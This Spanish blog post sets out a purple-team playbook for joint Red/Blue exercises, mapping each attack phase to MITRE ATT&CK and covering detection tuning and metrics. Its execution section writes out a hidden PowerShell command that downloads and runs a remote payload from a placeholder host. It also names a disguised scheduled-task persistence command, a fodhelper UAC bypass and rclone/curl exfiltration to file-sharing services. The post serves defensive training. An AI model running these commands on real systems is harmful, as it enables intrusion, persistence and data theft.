Buscar

01 septiembre 2025

Playbook técnico: Purple Teaming – ejercicios colaborativos Red-Blue

  septiembre 01, 2025 akil3s   No comments   Edit

 

1️⃣ Introducción

El Purple Teaming no es un equipo nuevo, sino una forma de trabajo colaborativa entre Red Team y Blue Team. Su objetivo es mejorar la defensa usando ataques reales, iterando y ajustando detecciones, reglas y respuestas con cada simulación.

Este playbook describe cómo montar ejercicios Purple efectivos: desde la planificación táctica, herramientas, ejecución paso a paso y cómo medir resultados técnicos.

2️⃣ Objetivos técnicos del Purple Teaming

  • Validar detecciones (SIEM, EDR, NDR) contra TTPs reales
  • Simular técnicas de MITRE ATT&CK por fase
  • Ajustar reglas Sigma, YARA, correlation rules y alertas
  • Validar tiempos de detección y contención
  • Transferir conocimientos entre Red y Blue para evolucionar ambos lados

3️⃣ Planificación del ejercicio

Antes de empezar, define con precisión:

  • Escenario: Ataque inicial → ejecución → persistencia → escalada → movimiento lateral → exfiltración.
  • Entorno: Red de laboratorio, infraestructura controlada o entorno real con permisos.
  • Roles: Red Team ataca y documenta Blue Team detecta y responde Purple Team coordina, registra y ajusta reglas.
  • Timing: Duración por fase: 1 a 2 horas

Tiempo total: entre medio día y 2 días (según profundidad).

4️⃣ Herramientas necesarias por equipo

  • Red Team: Cobalt Strike (demo) Sliver, SharpHound, Invoke-Obfuscation, Rubeus, GoPhish
  • Blue Team: EDR: (CrowdStrike, Defender ATP, SentinelOne, Wazuh, etc.). SIEM: (Splunk, Elastic, Sentinel). Velociraptor, Sysmon con configuración avanzada, reglas Sigma adaptadas.
  • Purple Team: MITRE ATT&CK Navigator. Planillas de mapeo. Cheatsheets de queries. Documentación compartida (Obsidian, OneNote, Git).

5️⃣ Ejecución táctica por fase

  • Acceso inicial (T1566 – Phishing): El Red Team lanza un correo con un documento .docm que ejecuta un stager de Cobalt Strike.
  • Ejecución (T1059 – PowerShell): Stager ejecuta un payload remoto con "código": powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://IP/payload.ps1')
  • Persistencia (T1053 – Scheduled Task): El payload genera una tarea automática con "código": schtasks /create /tn "OneDriveSync" /tr "powershell.exe ..." /sc onlogon
  • Escalada de privilegios (T1548 – Bypass UAC): Uso de fodhelper.exe para ejecutar "código" sin prompt
  • Descubrimiento (T1087 – Account Discovery): SharpHound recolecta info de dominio Velociraptor lanza queries de hunting paralelas para detectar acceso a objetos privilegiados
  • Movimiento lateral (T1021 – PsExec, WinRM): Uso de Impacket desde Kali + detección en SIEM por ID 4624 con logon type 3
  • Exfiltración (T1048 – over HTTPS): Uso de rclone o CURL hacia servicios como transfer.sh o Dropbox API

6️⃣ Coordinación y feedback en tiempo real

Después de cada fase:

  • El Red Team explica qué técnica usó, qué dejó como rastro y cómo evadió defensas.
  • El Blue Team revisa si lo detectó, cómo, cuánto tardó y qué se podría mejorar.
  • Purple Team ajusta reglas, arma nuevas queries y las despliega para repetir

Ejemplo:

Escalada → no se detectó el uso de fodhelper.exe → se añade regla Sigma con ParentImage != explorer.exe y CommandLine contains fodhelper.exe

7️⃣ Registro y documentación

Para cada fase documenta:

  • Técnica ATT&CK usada
  • Herramienta utilizada
  • Evidencia generada (logs, procesos, red, archivos)
  • Alertas generadas vs. esperadas
  • Tiempo de detección y contención
  • Resultado: detectado / no detectado / mitigado

Recomendación: usa MITRE Navigator para marcar qué técnicas se validaron con éxito y cuáles no.

8️⃣ Métricas que importan

  • Tiempo medio de detección (MTTD)
  • Tiempo medio de contención (MTTC)
  • Técnicas no detectadas (gap analysis)
  • Ajustes aplicados (reglas Sigma/YARA nuevas)
  • Lessons learned (por fase y generales)

9️⃣ Recursos útiles

🔟 Tip final

Un ejercicio de un Purple Team no es una demo ni un examen. Es una oportunidad brutal para que ofensiva y defensa crezcan juntos, se escuchen y se alineen. El objetivo no es detectar todo a la primera, sino aprender cómo piensan los atacantes... y cómo anticiparse a ellos en la siguiente.

Suscribirse a: Comentarios (Atom)